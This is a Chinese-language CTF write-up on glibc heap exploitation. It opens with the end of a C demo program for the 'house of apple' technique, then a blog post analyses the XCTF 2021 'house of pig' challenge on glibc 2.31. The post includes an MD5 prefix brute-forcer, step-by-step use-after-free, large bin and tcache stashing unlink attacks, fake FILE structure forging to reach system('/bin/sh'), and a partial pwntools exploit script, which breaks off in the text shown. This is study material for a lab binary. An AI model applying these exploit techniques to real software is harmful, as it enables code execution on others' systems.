                 "  fp->_wide_data->_IO_write_end = snf->overflow_buf;\n"
                 "\n\033[1;" PURPLE "m"
                 "  /* Since we are not really interested in storing the characters\n"
                 "     which do not fit in the buffer we simply ignore it.  */\n"
                 "  return c;\n"
                 "}\n\n");

    printf_color(GREEN, UNDEFINED, "下面是_wide_data字段的结构体内容：\n\n");

    printf_color(BLUE, HIGHLIGHT, "(/libio/libio.h, line 121)\n");
    printf_color(PURPLE, HIGHLIGHT,
                 "struct _IO_wide_data\n"
                 "{\n"
                 "  wchar_t *_IO_read_ptr;\t/* Current read pointer */\n"
                 "  wchar_t *_IO_read_end;\t/* End of get area. */\n"
                 "  wchar_t *_IO_read_base;\t/* Start of putback+get area. */\n"
                 "  wchar_t *_IO_write_base;\t/* Start of put area. */\n"
                 "  wchar_t *_IO_write_ptr;\t/* Current put pointer. */\n"
                 "  wchar_t *_IO_write_end;\t/* End of put area. */\n"
                 "  wchar_t *_IO_buf_base;\t/* Start of reserve area. */\n"
                 "  wchar_t *_IO_buf_end;\t\t/* End of reserve area. */\n"
                 "  /* The following fields are used to support backing up and undo. */\n"
                 "  wchar_t *_IO_save_base;\t/* Pointer to start of non-current get area. */\n"
                 "  wchar_t *_IO_backup_base;\t/* Pointer to first valid character of\n"
                 "\t\t\t\t   backup area */\n"
                 "  wchar_t *_IO_save_end;\t/* Pointer to end of non-current get area. */\n"
                 "\n"
                 "  __mbstate_t _IO_state;\n"
                 "  __mbstate_t _IO_last_state;\n"
                 "  struct _IO_codecvt _codecvt;\n"
                 "\n"
                 "  wchar_t _shortbuf[1];\n"
                 "\n"
                 "  const struct _IO_jump_t *_wide_vtable;\n"
                 "};\n\n");

    printf_color(GREEN, UNDEFINED, "注意红色部分的代码，在假结构体中，我们可以控制_wide_data指针的值，因此可以实现在任意位置写入任意值。\n");
    printf_color(GREEN, UNDEFINED, "下面是_IO_wstrnfile结构体的定义部分：\n\n");

    printf_color(BLUE, HIGHLIGHT, "(/libio/strfile.h, line 49)\n");
    printf_color(PURPLE, HIGHLIGHT,
                 "struct _IO_streambuf\n"
                 "{\n"
                 "  FILE _f;\n"
                 "  const struct _IO_jump_t *vtable;\n"
                 "};\n"
                 "\n"
                 "typedef struct _IO_strfile_\n"
                 "{\n"
                 "  struct _IO_streambuf _sbf;\n"
                 "  struct _IO_str_fields _s;\n"
                 "} _IO_strfile;\n"
                 "\n"
                 "/* frozen: set when the program has requested that the array object not\n"
                 "   be altered, reallocated, or freed. */\n"
                 "#define _IO_STR_FROZEN(FP) ((FP)->_f._flags & _IO_USER_BUF)\n"
                 "\n"
                 "typedef struct\n"
                 "{\n"
                 "  _IO_strfile f;\n"
                 "  /* This is used for the characters which do not fit in the buffer\n"
                 "     provided by the user.  */\n"
                 "  char overflow_buf[64];\n"
                 "} _IO_strnfile;\n"
                 "\n"
                 "extern const struct _IO_jump_t _IO_strn_jumps attribute_hidden;\n"
                 "\n"
                 "\n"
                 "typedef struct\n"
                 "{\n"
                 "  _IO_strfile f;\n"
                 "  /* This is used for the characters which do not fit in the buffer\n"
                 "     provided by the user.  */\n"
                 "  wchar_t overflow_buf[64];\n"
                 "} _IO_wstrnfile;\n\n");

    printf_color(GREEN, UNDEFINED, "可以看到写入的地址值也是我们可以控制的。\n");
    printf_color(GREEN, UNDEFINED, "需要注意的是，");
    printf_color(RED, HIGHLIGHT, "_IO_wstrn_overflow函数在IDA中的符号表中并不存在。\n");
    printf_color(GREEN, UNDEFINED, "因此在调试时最好可以添加glibc的源码辅助进行调试，效果更好。"
                                                        "使用dir + 源码目录即可添加源码。\n");
    printf_color(GREEN, UNDEFINED, "另外，可以通过https://libc.rip/查询到所有符号的偏移，"
                                                        "但数据库中尚未保存本测试环境使用的新版本的libc。\n");
    printf_color(GREEN, UNDEFINED, "通过对_IO_wstrn_jumps跳转表的定义可以大致筛选出_IO_wstrn_jumps的几个地址。\n");
    printf_color(GREEN, UNDEFINED, "在__libc_IO_vtables段进行查询，可以找到两个候选的地址：0x82F80和0x847C0。\n");
    printf_color(GREEN, UNDEFINED, "对应3个不同的_IO_jump_t结构体：0x215DC0、0x215E80、0x216180。\n");
    printf_color(GREEN, UNDEFINED, "经过gdb调试可知，_IO_wstrn_jumps的地址偏移应为0x215DC0，_IO_wstrn_overflow为0x82F80。\n\n");

    printf_color(GREEN, UNDEFINED, "我们首先获取libc地址和基地址。\n");

    size_t libc_base = (size_t)puts - 0x80ED0;  // puts函数的偏移
    FILE* fake_FILE = malloc(0x400);

    printf_color(BLUE, HIGHLIGHT, "libc基地址：");
    printf("\033[1;" BLUE "m%#zx\n" STR_END, libc_base);
    printf_color(BLUE, HIGHLIGHT, "堆地址：");
    printf("\033[1;" BLUE "m%#zx\n\n" STR_END, (size_t)fake_FILE);

    printf_color(GREEN, UNDEFINED, "下面，我们将malloc出来的地址作为假_IO_FILE_complete_plus的地址，并修改_IO_list_all。\n\n");

    printf_color(BLUE, HIGHLIGHT, "(/libio/genops.c， line 684)\n");
    printf_color(PURPLE, HIGHLIGHT,
                 "int\n"
                 "_IO_flush_all_lockp (int do_lock)\n"
                 "{\n"
                 "  int result = 0;\n"
                 "  FILE *fp;\n"
                 "\n"
                 "#ifdef _IO_MTSAFE_IO\n"
                 "  _IO_cleanup_region_start_noarg (flush_cleanup);\n"
                 "  _IO_lock_lock (list_all_lock);\n"
                 "#endif\n"
                 "\n"
                 "  \033[1;31mfor (fp = (FILE *) _IO_list_all; fp != NULL; fp = fp->_chain)\n"
                 "    {\n"
                 "      run_fp = fp;\n"
                 "      if (do_lock)\n"
                 "\t_IO_flockfile (fp);\n"
                 "\n"
                 "      if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)\n"
                 "\t   || (_IO_vtable_offset (fp) == 0\n"
                 "\t       && fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr\n"
                 "\t\t\t\t    > fp->_wide_data->_IO_write_base))\n"
                 "\t   )\n"
                 "\t  && _IO_OVERFLOW (fp, EOF) == EOF)\n"
                 "\tresult = EOF;\n"
                 "\n"
                 "      if (do_lock)\n"
                 "\t_IO_funlockfile (fp);\n"
                 "      run_fp = NULL;\n"
                 "    }\n\033[1;" PURPLE "m"
                 "\n"
                 "#ifdef _IO_MTSAFE_IO\n"
                 "  _IO_lock_unlock (list_all_lock);\n"
                 "  _IO_cleanup_region_end (0);\n"
                 "#endif\n"
                 "\n"
                 "  return result;\n"
                 "}\n\n");

    printf_color(GREEN, HIGHLIGHT, "依然需要注意_IO_flush_all_lockp中的判断条件。\n\n");

    fake_FILE->_mode = 0;
    fake_FILE->_IO_write_ptr = (char*)1;
    fake_FILE->_IO_write_base = (char*)0;
    ((size_t*)fake_FILE)[0xd8 / 8] = libc_base + 0x215DC0;
    size_t* IO_list_all = (size_t *) (libc_base + 0x21A680);
    *IO_list_all = (size_t)fake_FILE;

    printf_color(GREEN, UNDEFINED, "我们想要修改的地址为：");
    printf("\033[1;" RED "m%#zx\n" STR_END, (size_t)victim);

    printf_color(GREEN, UNDEFINED, "下面是通过GDB查看到的_IO_wstrn_overflow函数的汇编：\n");
    printf_color(PURPLE, HIGHLIGHT,
                 "=> 0x7ffff7e02f80 <_IO_wstrn_overflow>:\tendbr64 \n"
                 "   0x7ffff7e02f84 <_IO_wstrn_overflow+4>:\tpush   r12\n"
                 "   0x7ffff7e02f86 <_IO_wstrn_overflow+6>:\tmov    r12d,esi\n"
                 "   0x7ffff7e02f89 <_IO_wstrn_overflow+9>:\t\033[1;31mlea    rsi,[rdi+0xf0]\n\033[1;" PURPLE "m"
                 "   0x7ffff7e02f90 <_IO_wstrn_overflow+16>:\tpush   rbx\n"
                 "   0x7ffff7e02f91 <_IO_wstrn_overflow+17>:\tmovq   xmm0,rsi\n"
                 "   0x7ffff7e02f96 <_IO_wstrn_overflow+22>:\tpunpcklqdq xmm0,xmm0\n"
                 "   0x7ffff7e02f9a <_IO_wstrn_overflow+26>:\tsub    rsp,0x28\n"
                 "   0x7ffff7e02f9e <_IO_wstrn_overflow+30>:\t\033[1;31mmov    rdx,QWORD PTR [rdi+0xa0]\n\033[1;" PURPLE "m"
                 "   0x7ffff7e02fa5 <_IO_wstrn_overflow+37>:\t\033[1;31mcmp    QWORD PTR [rdx+0x30],rsi\n\033[1;" PURPLE "m"
                 "   0x7ffff7e02fa9 <_IO_wstrn_overflow+41>:\tje     0x7ffff7e02fec <_IO_wstrn_overflow+108>\n"
                 "   0x7ffff7e02fab <_IO_wstrn_overflow+43>:\tmovq   xmm1,rsi\n"
                 "   0x7ffff7e02fb0 <_IO_wstrn_overflow+48>:\tmov    rbx,rdi\n"
                 "   0x7ffff7e02fb3 <_IO_wstrn_overflow+51>:\txor    ecx,ecx\n"
                 "   0x7ffff7e02fb5 <_IO_wstrn_overflow+53>:\tmovaps XMMWORD PTR [rsp+0x10],xmm0\n"
                 "   0x7ffff7e02fba <_IO_wstrn_overflow+58>:\tlea    rdx,[rdi+0x1f0]\n"
                 "   0x7ffff7e02fc1 <_IO_wstrn_overflow+65>:\tmovq   xmm2,rdx\n"
                 "   0x7ffff7e02fc6 <_IO_wstrn_overflow+70>:\tpunpcklqdq xmm1,xmm2\n"
                 "   0x7ffff7e02fca <_IO_wstrn_overflow+74>:\tmovaps XMMWORD PTR [rsp],xmm1\n"
                 "   0x7ffff7e02fce <_IO_wstrn_overflow+78>:\tcall   0x7ffff7e03610 <__GI__IO_wsetb>\n"
                 "   0x7ffff7e02fd3 <_IO_wstrn_overflow+83>:\tmovdqa xmm1,XMMWORD PTR [rsp]\n"
                 "   0x7ffff7e02fd8 <_IO_wstrn_overflow+88>:\tmov    rdx,QWORD PTR [rbx+0xa0]\n"
                 "   0x7ffff7e02fdf <_IO_wstrn_overflow+95>:\tmovdqa xmm0,XMMWORD PTR [rsp+0x10]\n"
                 "   0x7ffff7e02fe5 <_IO_wstrn_overflow+101>:\tmovups XMMWORD PTR [rdx],xmm1\n"
                 "   0x7ffff7e02fe8 <_IO_wstrn_overflow+104>:\tmovups XMMWORD PTR [rdx+0x10],xmm0\n"
                 "   0x7ffff7e02fec <_IO_wstrn_overflow+108>:\tmovups XMMWORD PTR [rdx+0x20],xmm0\n"
                 "   0x7ffff7e02ff0 <_IO_wstrn_overflow+112>:\tadd    rsp,0x28\n"
                 "   0x7ffff7e02ff4 <_IO_wstrn_overflow+116>:\tmov    eax,r12d\n"
                 "   0x7ffff7e02ff7 <_IO_wstrn_overflow+119>:\tpop    rbx\n"
                 "   0x7ffff7e02ff8 <_IO_wstrn_overflow+120>:\tpop    r12\n"
                 "   0x7ffff7e02ffa <_IO_wstrn_overflow+122>:\tret\n\n");

    printf_color(GREEN, UNDEFINED, "上面的红色部分就是函数中的if语句比较部分，可见overflow_buf在结构体中的偏移量为0xF0。\n");
    printf_color(GREEN, UNDEFINED, "另外看一下_IO_wsetb函数：\n\n");

    printf_color(BLUE, HIGHLIGHT, "(/libio/wgenops.c, line 91)\n");
    printf_color(PURPLE, HIGHLIGHT,
                 "void\n"
                 "_IO_wsetb (FILE *f, wchar_t *b, wchar_t *eb, int a)\n"
                 "{\n"
                 "  if (f->_wide_data->_IO_buf_base && !(f->_flags2 & _IO_FLAGS2_USER_WBUF))\n"
                 "    free (f->_wide_data->_IO_buf_base);\n"
                 "  f->_wide_data->_IO_buf_base = b;\n"
                 "  f->_wide_data->_IO_buf_end = eb;\n"
                 "  if (a)\n"
                 "    f->_flags2 &= ~_IO_FLAGS2_USER_WBUF;\n"
                 "  else\n"
                 "    f->_flags2 |= _IO_FLAGS2_USER_WBUF;\n"
                 "}\n\n");

    printf_color(GREEN, UNDEFINED, "显然这里如果我们要伪造_wide_data，就必须绕过第一个if语句。\n");
    printf_color(GREEN, UNDEFINED, "如果要写入的地址一开始的_IO_buf_base处就是0，那么这个语句可以直接跳过。\n");
    printf_color(GREEN, UNDEFINED, "但更多时候这里的值可能不是确定的，因此需要第二个判断条件。\n");
    printf_color(GREEN, UNDEFINED, "_IO_FLAGS2_USER_WBUF的值为8，即让f->_flags2 & 8 != 0即可。\n");

    fake_FILE->_flags2 = 0x8;

    printf_color(GREEN, UNDEFINED, "我们将这里修改为目标地址。\n");

    fake_FILE->_wide_data = (struct _IO_wide_data *) (char *) victim;

    printf_color(YELLOW, HIGHLIGHT, "修改前：\n");
    print_binary((char*)victim, 0x80);

    printf_color(GREEN, UNDEFINED, "为了能够在exit函数调用后看到修改后的目标地址内容，需要另外一个假FILE结构体。\n");
    printf_color(GREEN, UNDEFINED, "实际上在house of apple之后，也多使用另一个FILE结构体进行其他的操作。\n");
    printf_color(GREEN, UNDEFINED, "将第二个假FILE结构体地址填到第一个FILE的_chain字段，使两者链接。\n");
    printf_color(GREEN, UNDEFINED, "第二个结构体使用另外一个_IO_jumps_t指针。\n");

    FILE* fake_FILE_2 = malloc(0x400);
    fake_FILE->_chain = fake_FILE_2;

    mprotect((void*)(libc_base + 0x215000), 0x4000, PROT_READ | PROT_WRITE);

    printf_color(GREEN, UNDEFINED, "本程序为了方便起见，选择直接修改vtable段为可写，"
                                                        "并修改第二个FILE使用的_IO_jumps_t中的overflow指针。\n");
    size_t* other_IO_jumps = (size_t*)(libc_base + 0x215E80);
    other_IO_jumps[3] = (size_t)print_victim;

    fake_FILE_2->_mode = 0;
    fake_FILE_2->_IO_write_ptr = (char*)1;
    fake_FILE_2->_IO_write_base = (char*)0;
    ((size_t*)fake_FILE_2)[0xd8 / 8] = libc_base + 0x215E80;
    fake_FILE_2->_flags2 = 0x8;
    fake_FILE_2->_wide_data = (struct _IO_wide_data *) (char *) victim;

    exit(-1);
}

glibc 2.31 pwn——house of pig原题分析与示例程序

发表于 2023-02-28 更新于 2024-07-19 分类于学习笔记， glibc 系列
本文字数： 31k 阅读时长 ≈ 28 分钟

house of pig这种利用方式来源于XCTF 2021 final中的同名题，其原题使用的是libc 2.31版本，本文就根据这道题学习一下这种漏洞利用方式。

参考资料

这是一道C++ pwn，但漏洞本身与C++不同于C的特性关系不大。

一共提供了5个选项：

增，删，改，看，修改用户。我们一个一个来看。

A. 逆向分析

A.1 add message

除了修改用户之外，其他4个选项的具体操作因用户而异，一共有3个用户，peppa、mummy和daddy，对于add message操作而言，3个用户的操作基本相同，只有几个地方有差别。

上图是peppa的add message函数，peppa可以遍历0~19的索引，并添加一个大小在0x90~0x430的chunk，在mummy的add函数中只能遍历0~\9的索引，并添加大小在0x90~0x450的chunk。对于peppa和mummy，其分配的chunk大小只能一次比一次大或者本次与上一次相等，daddy则没有这个限制。对于daddy，则是0~4的索引和0x90~0x440的chunk。另外，在daddy函数中如果添加chunk的索引为4，则还可以再分配一个大小为0xE8的chunk并写入最大长度为0xE8的内容。 3个用户在add之后可以立即向新分配的chunk中写入内容，但不是chunk中任何位置都能写。对于peppa，将chunk空间以48字节为大小分组，每一组48字节空间只能写前面16字节，对于mummy则是只能写中间16字节，对于daddy只能写后面16字节。在写入后，会设置两个标志位为0。

A.2 view message

查看，没有什么好说的，3个用户可以查看的索引范围和可以add的索引范围相同。而且查看时需要有一个标志位为0。这个标志位是add中设置的两个标志位中的第一个。本题限制view的次数最多为2次。

A.3 edit message

编辑，3个用户可以查看的索引范围和可以add的索引范围相同。而且查看时需要有一个标志位为0。这个标志位和view message的标志位相同。本题限制edit的次数最多为8次。

A.4 delete message

删除，3个用户可以查看的索引范围和可以add的索引范围相同。删除后会将两个标志位置为1。

A.5 change role

修改用户。这个部分的主体部分在main函数中实现。分析一下检查函数：

该函数使用了MD5计算摘要值，如何判断？查看MD5_initialize函数可以发现，这里定义了4个MD5计算的关键魔数，因此不难判断。

在检查函数中，会对输入值与MD5摘要进行判断，判断条件：MD5摘要需要等于某个值，输入值的第一位应该是A或B或C。首字母不同，能够转换到的用户也不同。我们当然不能追求计算出来3个值使得其MD5摘要值相等，但该MD5的比较有bug：

上图就是保存的MD5值，注意到第三个字节为’\0’，但原程序中比较MD5值使用的是strcmp函数，因此最多只会比较前面3个字节的值。计算出三个摘要的前3字节等于固定值的字符串还是可以实现的，下面是计算的代码，计算结果已经附在后面：

from hashlib import md5
from pwn import *
import threading

alphabet = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+='
length = 6
start_char = 'ABC'
current = [0, 0, 0]

def calculate(index: int):
    for i in range(64 ** (length - 1)):
        cur_string = start_char[index]
        current_copy = current[index]
        for j in range(length - 1):
            cur_string += alphabet[current_copy % 64]
            current_copy //= 64
        digest = md5(cur_string.encode()).hexdigest()
        if digest[0:6] == '3c4400':
            print(cur_string, ': ', digest)
            return
        current[index] += 1


if __name__ == '__main__':
    threads = [threading.Thread(name='t1', target=calculate, args=(0,)),
               threading.Thread(name='t1', target=calculate, args=(1,)),
               threading.Thread(name='t1', target=calculate, args=(2,))]
    for i in range(3):
        threads[i].start()

'''
AY7Hr0 :  3c4400d1ec4941bfc9e4846a9a4a409e
CnY841 :  3c4400f378c82f5ceeb3f309b0ed1e6d
BRgTa2 :  3c440036c7cad38b57f4b417df22a0c4
'''

根据程序输出，我们获得了三个字符串，在转换用户时只需要输入这3个字符串就能够进行任意的用户转换操作。其中A表示peppa，B表示mummy，C表示daddy。

在检查函数通过之后，如果我们会更换用户，则会将原来用户分配的chunk复制到一个程序预先分配号的一块空间，然后将新用户的chunk以及标志位等从那一块空间中复制出来。

但是这里需要注意从mmap出来空间中复制过来的只有第二个标志位，第一个标志位并没有被复制过来。

B. 漏洞分析

本题的漏洞就在于用户的分配上。由于新用户只是复制了第二个标志位，对于某个chunk的索引而言，如果原用户的两个对应标志位均为0，而新用户的两个标志位为1，则用户转换后，两个标志位分别为0和1。注意view message和edit message检查的都是第1个标志位是否为0，对于新用户而言，这个索引原本的chunk是已经被释放的，但这样一来我们就可以再一次访问这个chunk，这就产生了UAF。

但只有一个UAF，应该如何利用本题的漏洞呢？这就需要介绍一下house of pig这种利用方式的思路了。

该攻击方式适用于 libc 2.31及以后的新版本 libc，本质上是通过 libc2.31 下的 largebin attack以及 FILE 结构利用，来配合 libc2.31 下的 tcache stashing unlink attack 进行组合利用的方法。主要适用于程序中仅有 calloc 函数来申请 chunk，而没有调用 malloc 函数的情况。

本题中，我们可以申请到在tcache保存大小范围的chunk，也可以申请到大于tcache大小的chunk，因此就完美符合这个条件。

house of pig在本题（libc 2.31版本）利用方式的本质是：想办法将__free_hook保存到tcache中，然后使用一个伪造的_IO_FILE结构体，并想办法将该假结构体链到_IO_list_all（最简单的方法是直接修改_IO_list_all的值到这里），并在glibc检测到内存分配出错时能够转到该_IO_FILE结构体执行_IO_str_overflow，在_IO_str_overflow中连续进行malloc、memcpy、free三个操作，通过memcpy将system函数地址写到__free_hook，通过后面紧跟着的free来getshell。

下面，我们就开始进行本题的漏洞利用。

C. 漏洞利用

首先写一下交互函数：

from pwn import *
context.log_level = 'debug'

io = process(['./pig'])
elf = ELF('./pig')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
password = [b'AY7Hr0', b'BRgTa2', b'CnY841']

def add(content_length, content):
    io.sendlineafter(b'Choice: ', b'1')
    io.sendlineafter(b'message size: ', str(content_length).encode())
    io.sendafter(b'message: ', content)

def view(index):
    io.sendlineafter(b'Choice: ', b'2')
    io.sendlineafter(b'index: ', str(index).encode())

def edit(index, content):
    io.sendlineafter(b'Choice: ', b'3')
    io.sendlineafter(b'index: ', str(index).encode())
    io.sendafter(b'message: ', content)

def delete(index):
    io.sendlineafter(b'Choice: ', b'4')
    io.sendlineafter(b'index: ', str(index).encode())

def change_role(role):
    io.sendlineafter(b'Choice: ', b'5')
    io.sendlineafter(b'user:\n', password[role])

C.1 准备tcache stashing unlink attack的堆环境

注意tcache stashing unlink attack需要有两个chunk进入small bins，如果首先进行large bin attack，将会产生一些large bin chunk和unsorted bin chunk，此时如果分配较小的chunk，这两个bins中的chunk都有可能会进行拆分，进而扰乱small bins结构，因此最好能够在一切开始之前首先准备好small bins环境，毕竟small bins中的chunk相对而言是比较稳定的，不会被拆分，只有需要分配对应大小的chunk时才可能发生变化。这种对于不同操作顺序的考虑应该是在进行多次尝试后才能最终确定的，考虑到本题中严格的限制条件，选手很有可能会因为没有使用正确的操作顺序而迟迟无法获得推进。这也提醒我们在遇到困难时可以尝试修改相对独立的操作之间的顺序，以寻找突破口。

tcache stashing unlink的堆环境要求有5个chunk位于同一个tcache bins中，同时有2个相同大小的chunk位于small bins，之后通过修改small bins中链首chunk的bk指针可以将任意地址链入到tcache。

step 1: 使用mummy分配5个chunk并释放进入tcache。本操作使用了5个mummy的chunk，mummy剩余5个chunk可以使用。
step 2: 使用peppa用户分配较大的chunk并释放占满tcache。
step 3: 使用peppa用户分配相同大小的1个chunk并释放进入unsorted bin
step 4: 使用mummy用户分配较小chunk使peppa用户的chunk被拆分，计算大小使得拆分后的free chunk大小等于tcache中chunk的大小，此时free chunk在拆分后将会进入small bins。
step 5: 重复步骤2~4，但需要占满另外一个tcache，不能只通过占满一个tcache使两个chunk进入small bins，因此第二次执行步骤2应该填满一个存更大chunk的tcache，然后mummy对应分配的chunk也增加一些。

在上述步骤完成后，堆中应该有1个chunk进入small bins，1个chunk进入unsorted bin，5个位于tcache，这7个chunk的大小相同，进入small bins的chunk是在第二次进行步骤2时需要分配比其大的chunk时将其从unsorted bin转入small bins中的。上述步骤完成后，peppa将会使用16个chunk，mummy将会使用7个chunk。下图即为该步骤完成后的堆环境，需要进行攻击的是大小为0xA0的chunk。

C.2 获取libc地址和堆地址

既然我们需要__free_hook的地址，就应该获得libc的基地址。这个基地址很好获得，只需要分配一个tcache装不下的chunk然后释放掉，通过UAF读取前面的16字节即可。此时这里应该保存的是unsorted bin的地址。

在步骤A执行时，可以顺便获取到libc的基地址，只需要在unsorted bin中存在chunk时通过UAF进行view操作即可。

同理，我们也可以通过UAF读取到tcache中chunk保存的堆地址。

这一步不需要另外分配其他的chunk，为下面的步骤节约出了chunk。两次view的机会也全部用完，后面将不能使用view查看，不过我们已经获得了足够的信息。

在此之后我们就要正式进行house of pig的利用。

C.3 第一次large bin attack

首先我们需要将_free_hook周围的空间变成一个假chunk，这可以通过large bin attack轻松实现。

高版本libc的large bin attack攻击方式如上图所示（摘自本人以前的博文），我们按照这种方式进行一次攻击。考虑到large bin中的bk_nextsize的偏移为0x20，因此需要使用mummy用户的chunk作为large bin chunk，这样可以修改到bk_nextsize。操作思路如下：

step 1: 在mummy用户下分配0x450大小（带头部，下同）的chunk
step 2: 在peppa用户下分配0x440大小的chunk
step 3: 释放mummy用户的0x450大小的chunk
step 4: 在mummy用户下分配0x460大小的chunk，这一步可以让mummy的0x450 chunk进入large bin
step 5: 在peppa用户下释放0x440大小的chunk，这一步就构造好了large bin attack的堆环境
step 6: 通过UAF修改mummy用户0x450 free chunk中的bk_nextsize为__free_hook附近的地址

注意这里对分配大小的控制，large bins的前面几个bins是以0x40为大小进行划分，如果分配chunk的大小就为0x450和0x440，这两个chunk可以链入到一个bin中，这是实现large bin attack的前提，如果不能链入同一个bin，就无法对bk_nextsize进行操作。然后考虑到需要让较大chunk进入large bins，必须要能够分配一个更大的chunk，这里mummy分配0x460的chunk就可以将0x450的chunk链入到large bins。下图是第一次large bin attack之后的bins情况。

C.4 第二次large bin attack

第二次large bin attack，我们的目标是将未来的假_IO_FILE地址写到_IO_list_all中。上一次large bin attack中使用的large bin是可以重用的，我们将bk_nextsize指针改到其他位置还能够再一次进行攻击。第二次large bin attack应该写的具体的堆地址应该根据堆环境进行确定，选择的偏移至关重要。为了方便起见，我们的伪造_IO_FILE结构体应该在daddy分配索引为4的chunk时附加送给我们的一个chunk中进行构造。向_IO_list_all中写入的是large bin chunk的地址，如果想要这里同时也指向假_IO_FILE指针，就需要计算好chunk的分配数量，在calloc(0xE8)时能够正好让这个chunk被拆分，这样就实现了此处可写。

step 1: 在上一步预先多分配0x440的chunk，在这里释放
step 2: 修改bk_nextsize的值为_IO_list_all-0x20
step 3: 触发large bin attack

C.5 tcache stashing unlink attack以及构造`_IO_FILE`

在第一次large bin attack之后，我们将一个堆地址写到了__free_hook-10的位置，接下来就需要通过tcache stashing unlink attack将这个地址用_IO_str_overflow函数中的malloc函数分配出来。

在第一步我们已经在tcache和small bins中构造好了攻击环境，下面只需要分配即可。注意这里tcache stashing unlink attack将__free_hook所在地址转移到tcache一定是在daddy分配到最后一个chunk时才能触发，这样可以接上后续写一个0xE8的chunk伪造_IO_FILE结构体。

这里我们看一下2.31版本libc中_IO_str_overflow的源码：

int
_IO_str_overflow (FILE *fp, int c)
{
  int flush_only = c == EOF;
  size_t pos;
  if (fp->_flags & _IO_NO_WRITES)
      return flush_only ? 0 : EOF;
  if ((fp->_flags & _IO_TIED_PUT_GET) && !(fp->_flags & _IO_CURRENTLY_PUTTING))
    {
      fp->_flags |= _IO_CURRENTLY_PUTTING;
      fp->_IO_write_ptr = fp->_IO_read_ptr;
      fp->_IO_read_ptr = fp->_IO_read_end;
    }
  pos = fp->_IO_write_ptr - fp->_IO_write_base;
  if (pos >= (size_t) (_IO_blen (fp) + flush_only))
    {
      if (fp->_flags & _IO_USER_BUF) /* not allowed to enlarge */
	return EOF;
      else
	{
	  char *new_buf;
	  char *old_buf = fp->_IO_buf_base;
	  size_t old_blen = _IO_blen (fp);
	  size_t new_size = 2 * old_blen + 100;
	  if (new_size < old_blen)
	    return EOF;
	  new_buf = malloc (new_size);
	  if (new_buf == NULL)
	    {
	      /*	  __ferror(fp) = 1; */
	      return EOF;
	    }
	  if (old_buf)
	    {
	      memcpy (new_buf, old_buf, old_blen);
	      free (old_buf);
	      /* Make sure _IO_setb won't try to delete _IO_buf_base. */
	      fp->_IO_buf_base = NULL;
	    }
	  memset (new_buf + old_blen, '\0', new_size - old_blen);

	  _IO_setb (fp, new_buf, new_buf + new_size, 1);
	  fp->_IO_read_base = new_buf + (fp->_IO_read_base - old_buf);
	  fp->_IO_read_ptr = new_buf + (fp->_IO_read_ptr - old_buf);
	  fp->_IO_read_end = new_buf + (fp->_IO_read_end - old_buf);
	  fp->_IO_write_ptr = new_buf + (fp->_IO_write_ptr - old_buf);

	  fp->_IO_write_base = new_buf;
	  fp->_IO_write_end = fp->_IO_buf_end;
	}
    }

  if (!flush_only)
    *fp->_IO_write_ptr++ = (unsigned char) c;
  if (fp->_IO_write_ptr > fp->_IO_read_end)
    fp->_IO_read_end = fp->_IO_write_ptr;
  return c;
}

重点注意从21行到36行的内容，首先是计算了_IO_FILE结构体中缓冲区的长度len，计算方式是_IO_buf_end - _IO_buf_base，参见下面的_IO_FILE结构体定义：（注：伪造的实际上是_IO_FILE_complete_plus结构体，其等于_IO_FILE+_IO_FILE_complete附加内容+vtable）

struct _IO_FILE
{
  int _flags;		/* High-order word is _IO_MAGIC; rest is flags. */

  /* The following pointers correspond to the C++ streambuf protocol. */
  char *_IO_read_ptr;	/* Current read pointer */
  char *_IO_read_end;	/* End of get area. */
  char *_IO_read_base;	/* Start of putback+get area. */
  char *_IO_write_base;	/* Start of put area. */
  char *_IO_write_ptr;	/* Current put pointer. */
  char *_IO_write_end;	/* End of put area. */
  char *_IO_buf_base;	/* Start of reserve area. */
  char *_IO_buf_end;	/* End of reserve area. */

  /* The following fields are used to support backing up and undo. */
  char *_IO_save_base; /* Pointer to start of non-current get area. */
  char *_IO_backup_base;  /* Pointer to first valid character of backup area */
  char *_IO_save_end; /* Pointer to end of non-current get area. */

  struct _IO_marker *_markers;

  struct _IO_FILE *_chain;

  int _fileno;
  int _flags2;
  __off_t _old_offset; /* This used to be _offset but it's too small.  */

  /* 1+column number of pbase(); 0 is unknown. */
  unsigned short _cur_column;
  signed char _vtable_offset;
  char _shortbuf[1];

  _IO_lock_t *_lock;
#ifdef _IO_USE_OLD_IO_FILE
};

然后使用malloc函数申请一块空间，这块空间的大小等于len * 2 + 100，因此我们需要计算好len的值好让malloc能够分配到tcache中__free_hook附近空间。然后调用了memcpy函数将old_buf中的内容复制到new_buf中，在前面所有工作都完成的情况下，这里的new_buf就应该是__free_hook附近的地址，而old_buf这个地址是我们可以控制的，是我们写在假_IO_FILE结构体中的，因此我们可以让_old_buf指向一个写有system函数地址的空间，然后通过memcpy函数将其复制到__free_hook中。

之后，调用free函数，其参数是old_buf这个地址，我们只需要让这个地址开头写有/bin/sh即可执行system("/bin/sh")。这里的内容需要进行精心设计，要控制好偏移的值，同时还需要保证写入到_IO_list_all的堆地址就是假FILE结构体的地址。注意到_IO_list_all的堆地址实际上是large bin中的chunk地址，因此可以通过在最后calloc时切割这个large bin chunk实现对该地址及后面大块空间的完全控制。

至于我们如何让程序执行_IO_str_overflow这个函数，很简单。这个函数的地址是保存在_IO_str_jumps这个结构体中的，在一般程序正常运行的情况下，_IO_list_all保存有指向标准输入输出的FILE结构体，其中的vtable指向的应该是_IO_file_jumps，而_IO_file_jumps与_IO_str_jumps是一个结构体类型的实例，二者的不同之处是，_IO_file_jumps用于一个FILE结构体在出现异常时调用的函数列表，我们在假FILE结构体中将vtable写成_IO_str_jumps，实际上就是将程序的执行流从_IO_file_overflow改成_IO_str_overflow。这也是house of pig利用的思想精髓所在。

exp: （其中假FILE结构体中某些字段的设置也有讲究，这个会在下面的演示程序中说明）

import time

from pwn import *
context.log_level = 'debug'

io = process(['./pig'])
elf = ELF('./pig')
libc = ELF('/lib/x86_64-linux-gnu/libc.so.6')
password = [b'AY7Hr0', b'BRgTa2', b'CnY841']
current_user = 0

def add(content_length, content = None):
    io.sendlineafter(b'Choice: ', b'1')
    io.sendlineafter(b'message size: ', str(content_length).encode())
    if content is None:
        content = str(current_user) * (content_length // 0x30 * 0x10)
    io.sendafter(b'message: ', content)

def view(index):
    io.sendlineafter(b'Choice: ', b'2')
